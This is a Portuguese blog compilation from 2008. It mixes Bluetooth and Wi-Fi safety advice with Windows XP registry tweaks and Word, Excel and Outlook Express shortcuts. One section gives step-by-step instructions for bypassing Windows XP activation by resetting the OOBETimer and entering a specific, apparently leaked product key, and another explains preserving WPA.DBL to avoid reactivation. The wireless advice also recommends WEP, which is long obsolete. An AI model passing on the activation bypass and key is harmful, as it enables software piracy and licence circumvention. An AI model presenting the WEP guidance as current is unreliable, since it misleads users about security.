A tecnologia bluetooth tem sido introduzida em diversos tipos de telefones celulares para permitir a transmissão de dados entre eles (por exemplo, contatos da agenda telefônica, agenda de compromissos, texto, imagens, etc), bem como conectar um telefone a outros tipos de dispositivo (por exemplo, fones de ouvido, sistema viva-voz de automóveis, etc). Outros exemplos de aparelhos que podem fornecer esta tecnologia são PDAs e notebooks.
O fato é que a inclusão da tecnologia bluetooth em aparelhos como telefones celulares e PDAs, entre outros, trouxe alguns riscos que podem afetar a privacidade de seus usuários.
Que riscos estão associados ao uso de aparelhos com bluetooth?
Muitas vezes, um aparelho que fornece a tecnologia bluetooth vem configurado de fábrica, ou é posteriormente configurado, de modo que qualquer outro aparelho possa se conectar a ele, indiscriminadamente. Esta configuração normalmente permite que dados sejam obtidos do aparelho sem qualquer tipo de controle.
O problema não reside no fato do aparelho disponibilizar a tecnologia, mas sim na má configuração das opções de bluetooth, que podem permitir que terceiros obtenham diversas informações de um aparelho. Estas informações podem incluir: agenda telefônica, agenda de compromissos, arquivos, imagens, entre outras.
Pode-se citar como exemplos os casos de algumas celebridades que tiveram todos os contatos telefônicos armazenados em seus aparelhos furtados e disponibilizados na Internet.
Que cuidados devo ter para evitar a exposição de informações de um aparelho com bluetooth?
É preciso tomar alguns cuidados para evitar a exposição de informações de um aparelho que fornece a tecnologia bluetooth. Alguns dos principais cuidados são:
mantenha o bluetooth do seu aparelho desabilitado e somente habilite-o quando for necessário. Caso isto não seja possível, consulte o manual do seu aparelho e configure-o para que não seja identificado (ou "descoberto") por outros aparelhos (em muitos aparelhos esta opção aparece como "Oculto" ou "Invisível");
fique atento às notícias, principalmente àquelas sobre segurança, veiculadas no site do fabricante do seu aparelho;
aplique todas as correções de segurança (patches) que forem disponibilizadas pelo fabricante do seu aparelho, para evitar que possua vulnerabilidades;
caso você tenha comprado uma aparelho usado, restaure as opções de fábrica (em muitos aparelhos esta opção aparece como "Restaurar Configuração de Fábrica" ou "Restaurar Configuração Original") e configure-o como no primeiro item, antes de inserir quaisquer dados.

REDE BANDA LARGA E Wireless

Redes Sem Fio (Wireless)
As redes sem fio (wireless), também conhecidas como IEEE 802.11, Wi-Fi ou WLANs, são redes que utilizam sinais de rádio para a sua comunicação.
Este tipo de rede define duas formas de comunicação:
modo infraestrutura: normalmente o mais encontrado, utiliza um concentrador de acesso (Access Point ou AP);
modo ponto a ponto (ad-hoc): permite que um pequeno grupo de máquinas se comunique diretamente, sem a necessidade de um AP.
Estas redes ganharam grande popularidade pela mobilidade que provêem aos seus usuários e pela facilidade de instalação e uso em ambientes domésticos e empresariais, hotéis, conferências, aeroportos, etc.
Quais são os riscos do uso de redes sem fio?
Embora esse tipo de rede seja muito conveniente, existem alguns problemas de segurança que devem ser levados em consideração pelos seus usuários:
estas redes utilizam sinais de rádio para a comunicação e qualquer pessoa com um mínimo de equipamento poderá interceptar os dados transmitidos por um cliente da rede sem fio (como notebooks, PDAs, estações de trabalho, etc);
por serem bastante simples de instalar, muitas pessoas estão utilizando redes desse tipo em casa, sem nenhum cuidado adicional, e até mesmo em empresas, sem o conhecimento dos administradores de rede.
Que cuidados devo ter com um cliente de uma rede sem fio?
Vários cuidados devem ser observados quando se pretende conectar à uma rede sem fio como cliente, seja com notebooks, PDAs, estações de trabalho, etc. Dentre eles, podem-se citar:
considerar que, ao conectar a uma WLAN, você estará conectando-se a uma rede pública e, portanto, seu computador estará exposto a ameaças. É muito importante que você tome os seguintes cuidados com o seu computador:
instalar um firewall pessoal;
instalar e manter atualizado um bom programa antivírus;
atualizar as assinaturas do antivírus diariamente;
aplicar as últimas correções em seus softwares (sistema operacional, programas que utiliza, etc);
desligar compartilhamento de disco, impressora, etc.
desabilitar o modo ad-hoc. Utilize esse modo apenas se for absolutamente necessário e desligue-o assim que não precisar mais;
sempre que possível usar WEP (Wired Equivalent Privacy), que permite criptografar o tráfego entre o cliente e o AP. Fale com o seu administrador de rede para verificar se o WEP está habilitado e se a chave é diferente daquelas que acompanham a configuração padrão do equipamento. O protocolo WEP possui diversas fragilidades e deve ser encarado como uma camada adicional para evitar a escuta não autorizada;
verificar com seu provedor de rede sem fio sobre a possibilidade de usar WPA (Wi-Fi Protected Access) em substituição ao WEP, uma vez que este padrão pode aumentar significativamente a segurança da rede. Esta tecnologia inclui duas melhorias em relação ao protocolo WEP que envolvem melhor criptografia para transmissão de dados e autenticação de usuário. Mesmo que seu equipamento seja mais antigo, é possível que exista uma atualização para permitir o uso de WPA;
considerar o uso de criptografia nas aplicações, como por exemplo, o uso de PGP para o envio de e-mails, SSH para conexões remotas ou ainda o uso de VPNs;
evitar o acesso a serviços que não utilizem conexão segura, ao usar uma rede sem fio em local público. Por exemplo, se for necessário ler e-mails ou acessar a Intranet da sua empresa, dê preferência a serviços que usem criptografia;
habilitar a rede sem fio somente quando for usá-la e desabilitá-la após o uso. Algumas estações de trabalho e notebooks permitem habilitar e desabilitar o uso de redes sem fio através de comandos ou botões específicos. No caso de notebooks com cartões PCMCIA, insira o cartão apenas quando for usar a rede e retire-o ao terminar de usar.
Que cuidados devo ter ao montar uma rede sem fio doméstica?
Pela conveniência e facilidade de configuração das redes sem fio, muitas pessoas têm instalado estas redes em suas casas. Nestes casos, além das preocupações com os clientes da rede, também são necessários alguns cuidados na configuração do AP. Algumas recomendações são:
ter em mente que, dependendo da potência da antena de seu AP, sua rede doméstica pode abranger uma área muito maior que apenas a da sua casa. Com isto sua rede pode ser utilizada sem o seu conhecimento ou ter seu tráfego capturado por vizinhos ou pessoas que estejam nas proximidades da sua casa;
mudar configurações padrão que acompanham o seu AP. Alguns exemplos são:
alterar as senhas. Dicas para a escolha de uma boa senha podem ser obtidas na
alterar o SSID (Server Set ID);
desabilitar o broadcast de SSID;
permitir que um computador se conecte ao AP para alterar as configurações apenas através da rede cabeada, se esta opção estiver disponível. Desta maneira um possível atacante externo (via rede sem fio) não poderá acessar o AP diretamente para promover mudanças na configuração.Verifique a documentação do seu AP sobre como efetuar estas mudanças, caso estejam disponíveis;
verificar se seus equipamentos já suportam WPA (Wi-Fi Protected Access) e utilizá-lo sempre que possível. Esta tecnologia é mais recente e inclui melhorias em relação ao protocolo WEP para prover uma segurança adicional contra acesso e escuta de tráfego não autorizada. Lembre-se que atualizações para WPA estão disponíveis para a maior parte dos equipamentos mais antigos;
caso o WPA não esteja disponível, usar sempre que possível WEP (Wired Equivalent Privacy), para criptografar o tráfego entre os clientes e o AP. Vale lembrar que o protocolo WEP possui diversas fragilidades e deve ser encarado como uma camada adicional para evitar a escuta não autorizada;
se for utilizar WEP, trocar as chaves que acompanham a configuração padrão do equipamento. Procure usar o maior tamanho de chave possível (128 bits);
desligar seu AP quando não estiver usando sua rede.
Existem configurações de segurança mais avançadas para redes sem fio, que requerem conhecimentos de administração de redes. Estes conhecimentos não são abordados neste documento.

Procurando micros na rede mais rapidamente

Quando procura por outros computadores na rede, o Windows XP verifica por tarefas agendadas em comum nas mesmas. Desabilitar este recurso faz com que a procura por outros micros da rede seja bem mais ágil. Siga as etapas abaixo:Iniciar > Executar, digite regedit (sem aspas), pressione OK. Vá em HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpacee procure pela chave {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Apague-a e pronto. A visualização/navegação por outras estações da rede ficará mais rápida.

3 de mar. de 2008

Desabilite os balões de aviso do Windows XP:

Se você deseja desabilitar aqueles "balões de aviso" que aparecem sempre que o Windows executa alguma função específica, faça o seguinte: vá em Iniciar / Executar, digite regedit e vá na chave HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced. Clique no menu Editar, vá em Novo / Valor DWORD, digite EnableBalloonTips e pressione Enter em seu teclado. Se já houver essa variável ali, altere o seu valor para 0 (zero). Reinicie o computador e os balões não serão mais exibidos pelo sistema.

Entrando diretamente no Windows:

Caso somente você esteja usando o computador e, por isso, o login não é necessário, você pode desabilitá-lo. Para isso, vá em Iniciar / Executar, digite control userpasswords2 e clique em OK. Na guia Usuários, desative o item Os usuários devem entrar com um nome e senha para usar este computador e clique em Aplicar. Quando o sistema pedir um nome de usuário e uma senha, informe o usuário padrão e digite uma senha (não deixe este campo em branco!). Após isso, pressione OK, vá em Iniciar / Configurações Painel de Controle / Contas de Usuário, clique em Alterar o modo como usuários fazem logon ou logoff e desative os itens Use a tela de boas-vindas e Use a Troca Rápida de Usuário. Com isso, o Windows carregará mais rápido e não será necessário passar pela tela de login.
Uma alternativa, é instalar a ferramenta Tweak UI da Microsoft (ver o item 10 desta página) e ir em Logon / Autologon, habilitar a caixa Log on automatically at system startup, escolher um usuário e em Set Password informar uma senha.

Fazendo backup do WPA, para evitar a reativação:

Se você tiver o Window XP já ativado e funcionando corretamente em seu computador, pode ser que necessite reinstalá-lo por algum motivo nesta mesma máquina. Neste caso, você terá que reativá-lo novamente para que o sistema funcione. Para evitar isso, antes da reinstalação, faça um backup (cópia) do arquivo WPA.DBL que está no diretório C:\Windows\System32. Após a reinstalação do Windows XP, coloque o arquivo neste mesmo diretório e ação está terminada. Vale dizer que o arquivo WPA.DBL é onde o sistema armazena as informações sobre o hardware instalado no computador.

29 de fev. de 2008

Computador ligando sozinho? Resova facilmente...

Comece a ganhar dinheiro agora na internet Clique Aqui!

Ao ligar o estabilizador, antes de ir ao botão Power, o computador já liga e abre o Windows. Esseproblema pode acontecer com algumas placas mães ligadas a alguns tipos de fontes. Quase sempre isso sedeve ao fato de placas-mães mais modernas poderem ligar sozinhas o computador quando detectamatividade de rede ou modem. A solução, então, é desabilitar esse recurso no Setup. Na seção PowerManagment é preciso encontrar a opção Wake Up Events e desabilitar as funções Wake Up on LAN e WakeUp on Modem.Assim, de "Enable" passe aquelas opções para "Disable".

Alterando letra do HD ou CD-ROM

Painel de controle>Ferramentas Administrativas>Gerenciamento do Computador.Encontre na coluna da esquerda Gerenciamento de disco.Na coluna da direita, clique com o botão direito do mouse sobre o disco e escolha a opção Alterar letra daunidade e caminho.

Trocando protetor de tela de login

Você pode usar no Windows o protetor de telas de sua preferência, mas o protetor padrão da tela de logincontinua sempre o mesmo. Para trocá-lo por outro de sua preferência, siga os passos seguintes. Encontre noregistro do Windows a chave abaixo:HKEY_USERS\DEFAULT\Control Panel\DesktopNa janela da direita, dê um clique duplo em SCRNSAVE.EXEEm Dados do Valor, digite o nome do protetor de telas que você deseja, com o caminho completo de ondeele se encontra. Se o protetor de telas estiver na pasta /System32 do Windows, bastará o nome do arquivo.Seu protetor de telas já estará trocado.

28 de fev. de 2008

Deletando arquivos temporarios da internet automaticamente.

O Internet Explorer automaticamente deleta os arquivos temporários ao ser fechado, mas isso não acontece por default. Selecione Ferramentas>Opções de Internet>Avançadas e marque a opção Esvaziar apasta Temporary Internet Files quando o navegador for fechado.

Retirando setas dos icones de atalho

Edite o registro. Escolha o item HKEY_CLASSES_RootLnkfile. Delete a chave IsShortcut. Uma maneiramais fácil de se conseguir isso é instalando o programa Powertoys.

20% DE BANDA LIBERADA NO XP

Há um recurso no Windows XP, chamado "Agendador de pacotes QoS", que reserva 20% da banda disponível de redee Internet para uso próprio. Para desabilitá-lo é necessário estar logado como Administrador e executar os seguintespassos: Vá em Iniciar / Executar e digite gpedit.msc e pressione OK. Após isso, vá em Configuração do computador /Modelos Administrativos / Rede e selecione na janela da esquerda Agendador de pacotes QoS. Na janela da direita, dêduplo-clique em Limite de reserva de banda. Depois, vá na aba Configuração e selecione Ativado. Na linha Limitar %da banda, digite 0 (zero). Clique em Aplicar e em OK. Agora vá ao Painel de Controle /Conexões de Rede, clique como botão direito na conexão existente e selecione Propriedades. Na aba Geral, habilite o Agendador de Pacotes QoS.Se já estiver habilitado, deixe-o assim. O último passo é reiniciar o computador. Se houver mais de um computador emrede, é preciso seguir este procedimento em todos para que haja um real benefício desta dica.

MENU INICIAR MAIS RAPIDO

Para deixar o Menu Iniciar do Windows XP mais rápido , execute o regedit.exe e vá emHKEY_CURRENT_USERControl PanelDesktop. Selecione MenuShowDelay na lista da direita e clique com o botãodireito do mouse em cima. Agora, escolha Modificar e mude o valor para 0 (zero). Após o computador inicializar, omenu Iniciar estará mais rápido

EXCLUINDO MSN QUE VEM COM O XP

1- Certifique-se que o msn do xp está fechado
2- Clique em INICIAR
3- Clique em EXECUTAR

Em seguida digite o código abaixo:

RunDll32 advpack.dll,LaunchINFSection %windir%INFmsmsgs.inf,BLC.Remove

4- Clique em OK.

Pronto! O msn que vem com o XP já esta removido.

VALIDAÇÃO DO WINDOWS

1. Vá ao menu Iniciar, Executar
2. Na janela que se abriu, digite regedit.
3. Já dentro do regedit, navegue até a chave: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ WindowsNT \ CurrentVersion \ WPAEvents
4. No painel á direita, clique duas vezes em OOBETimer.
5. Na janela que foi aberta, selecione qualquer valor e apague pressionando a tecla delete no teclado, e clique em OK.
6. Feche o regedit, e vá novamente em Iniciar, Executar, e dessa vez digite: %systemroot%\system32\oobe\msoobe.exe /a
7. Na janela que foi aberta, escolha a opção Sim, desejo telefonar...
8. Na próxima etapa, clique no botão Alterar chave do produto.
9. Na etapa seguinte, digite a CD-KEY nova e clique no botão Atualizar. (KEY: THMPV-77D6F-94376-8HGKG-VRDRQ)
10. Após clicar no botão Atualizar, o assistente para ativação voltará para a janela anterior, então, clique em Lembrar mais tarde e reinicie o Windows.
11. Reiniciado o Windows vá novamente em Iniciar, Executar e digite: %systemroot%\system32\oobe\msoobe.exe /a
A seguinte mensagem será mostrada, indicando que o procedimento foi executado com sucesso:
O Windows já está ativado clique em "OK" para sair.

Atalhos do Excel

shift + ctrl + seta p/ baixo =>vai para o ultimo registro da coluna
shift + ctrl + seta p/ cima =>vai para o primeiro registro da coluna
shift + ctrl + seta p/ direita =>vai para o ultimo registro da linha
shift + ctrl + seta p/ esquerda =>vai pra o primeiro registro da linha
ctrl + pgdown =>vai para a próxima planilha
ctrl + pgup =>vai para a planilha anterior
shfit + tab =>volta uma célula

Atalhos do Word

Alt + Ctrl + F =>Insere nota de rodapé, aquela com o número 1 sobrescrito no texto e a referência no pé da página
Alt + Ctrl + I, O, P ou N =>Muda estilo de visualização da página
Alt + Ctrl + Y =>Vai para início da página seguinte
Alt + Ctrl + M =>Insere comentário
Ctrl + [ ou ] =>Diminui ou aumenta tamanho da fonte em um ponto
Ctrl + = =>aplica subscrito
Ctrl + Shift + = =>Aplica sobrescrito
Ctrl + 1, 2 ou 5 =>Define espaçamento entre linhas simples, duplo ou de 1,5 linha
Ctrl + D =>Abre caixa de formatação de fonte
Ctrl + End =>Vai para fim do documento
Ctrl + I, N ou S =>Aplica efeito itálico, negrito ou sublinhado em termos selecionados
Ctrl + T =>Seleciona todo o texto
Ctrl + U =>Localiza e substitui palavras ou expressões
Ctrl + Del ou backspace =>Apaga palavra seguinte ou anterior
Ctrl + Shift + F8 =>Ativa seleção de bloco quadrilátero de texto
Ctrl + Shift + C ou V =>Copia ou cola formatação de fontes
F4 =>Repete a última ação
F7 =>Verifica ortografia e gramática
F12 =>Salvar como
Shift + F3 =>Aplica letras maiúsculas em todo o texto selecionado
Shift + F7 =>Abre dicionário de sinônimos
Ctrl + Home =>vai para o início do "mesmo" documento

Atalhos do Outlook Express

Ctrl + D =>Apaga mensagem
Ctrl + E =>Localiza pessoa no catálogo de endereços
Ctrl + F=>Encaminha mensagem
Ctrl + J=>Vai à próxima pasta com mensagens não lidas
Ctrl + M=>Enviar e receber mensagens
Ctrl + N=>Nova mensagem
Ctrl + Q=>Marca mensagem como lida
Ctrl + R=>Responde ao autor
Ctrl + S=>Salva mensagem
Ctrl + Enter=>Quando conectado e com destinatário definido, envia mensagem
Ctrl + F3=>Exibe código-fonte da mensagem
Ctrl + Shift + A=>Marca todas mensagens de uma pasta como lidas
Ctrl + Shift + B=>Abre catálogo de endereços
Ctrl + Shift + E=>Abre janela para criar nova pasta
Ctrl + Shift + F=>Localiza mensagem
Ctrl + Shift + N=>Cria nova entrada no catálogo de endereços
Ctrl + Shift + O=>Abre opções do Outlook Express
Ctrl + Shift + R=>Responder a todos
Esc =>Fecha mensagem